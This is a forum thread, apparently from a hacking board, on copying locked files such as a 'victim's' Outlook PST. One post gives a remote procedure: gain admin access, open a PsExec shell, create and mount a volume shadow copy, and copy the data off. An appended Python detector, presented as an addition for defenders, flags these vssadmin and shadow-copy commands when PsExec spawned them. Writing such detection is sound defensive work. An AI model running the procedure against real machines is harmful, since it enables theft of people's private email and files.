[Question] Copy Locked File(s)


0xFFFF

In my experience I have had a little difficulty duplicating files that are locked by other processes. One method I've used is to forcibly release the file and then commence copying. This option is ok but often causes the process to crash. The other method I've used is volume shadow copy. This method is ok if the service is enabled and you don't want the latest changes.

Both options have major disadvantages and I was wondering if anyone might have a better method?

The target in my test scenario has been the user's Outlook PST.


Not sure if anyone is interested in this but I've made progress. Most are probably already familiar with PsExec. What I've done is used that to silently create a VSC of the PST on demand which can then be 'restored' and copied or moved from the victim's machine. The process will take time due to the size of the PST. I've been working with ~700MB - 1.4GB files.


  • 5 months later...

...Ok. I'm raising this one from the dead. This topic hasn't been one of those super important projects, hence the really late post.

The best method (IMO) is to use VSC. So far it's worked on all the machines I've tested. In situations where programs are missing, I've simply copied them or used the -c option in psexec.exe. Don't forget you need to authenticate either using psexec or when opening the command prompt.

Step 1. Get Admin access using SAM or whatever.

Step 2. Remote to victim

psexec \\remotemachine.somedomain.com cmd

Step 3. See if VSC is working

vssadmin list shadows

If it is, make a note of the desired VSC and skip to Step 5.

Step 4. Create a VSC

vssadmin create shadow /for=C:

Go back to Step 3.

Step 5. Mount the desired VSC

mklink /d "C:\VSCmountpoint" \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyXXX\

Where VSCmountpoint is a folder anywhere on the system and HarddiskVolumeShadowCopyXXX is the VSC you want to mount.

Step 6. Copy stuff

xcopy / copy / whatever the file wherever you want.

Step 7. Unmount VSC

rmdir C:\VSCmountpoint

Step 8. Eat pizza.

Questions?
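
For defenders, the vssadmin steps in the procedure above show up in process-creation logs as children of the PsExec remote shell. The following is an added example, not part of the original thread: it walks the parent chain of each logged process and flags shadow-copy commands descended from PSEXESVC.exe (PsExec's default service binary name). The event fields, host names, PIDs and paths are constructed, and PID reuse is ignored.

```python
import re

# Command lines worth flagging: the vssadmin steps, and any direct reference
# to a shadow-copy device path (mklink is a cmd built-in, so it only appears
# in process-creation logs when launched as "cmd /c mklink ...").
SHADOW_CMD = re.compile(
    r"vssadmin(\.exe)?\s+(list\s+shadows|create\s+shadow)"
    r"|GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+", re.I)
REMOTE_PARENT = "psexesvc.exe"  # default name of the service PsExec installs

def ancestors(procs, pid):
    """Yield image names up the parent chain starting at pid (cycle-safe)."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        pid, image = procs[pid]["ppid"], procs[pid]["image"]
        yield image.lower()

def find_remote_shadow_use(events):
    """Return (host, cmdline) for shadow-copy commands descended from PsExec."""
    by_host = {}
    for e in events:
        by_host.setdefault(e["host"], {})[e["pid"]] = e
    hits = []
    for e in events:
        if not SHADOW_CMD.search(e["cmd"]):
            continue
        chain = ancestors(by_host[e["host"]], e["ppid"])
        if any(img.endswith(REMOTE_PARENT) for img in chain):
            hits.append((e["host"], e["cmd"]))
    return hits

def ev(host, pid, ppid, image, cmd):
    return {"host": host, "pid": pid, "ppid": ppid, "image": image, "cmd": cmd}

# Constructed events shaped like process-creation logs (all values made up).
SAMPLE = [
    ev("WS-017", 700, 4, r"C:\Windows\PSEXESVC.exe", r"C:\Windows\PSEXESVC.exe"),
    ev("WS-017", 812, 700, r"C:\Windows\System32\cmd.exe", "cmd"),
    ev("WS-017", 900, 812, r"C:\Windows\System32\vssadmin.exe", "vssadmin list shadows"),
    ev("WS-017", 901, 812, r"C:\Windows\System32\vssadmin.exe", "vssadmin create shadow /for=C:"),
    ev("WS-017", 902, 812, r"C:\Windows\System32\xcopy.exe", r"xcopy C:\VSCmountpoint\data D:\out"),
    ev("SRV-02", 300, 4, r"C:\Program Files\Backup\agent.exe", "agent.exe"),
    ev("SRV-02", 310, 300, r"C:\Windows\System32\vssadmin.exe", "vssadmin list shadows"),
]

if __name__ == "__main__":
    print(find_remote_shadow_use(SAMPLE))
```

The xcopy event is not flagged because its command line names only the link folder, not the shadow device, and mklink or rmdir typed at an interactive prompt create no process events at all. The local vssadmin call under the made-up backup agent on SRV-02 is left alone since nothing in its parent chain is PSEXESVC.exe.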
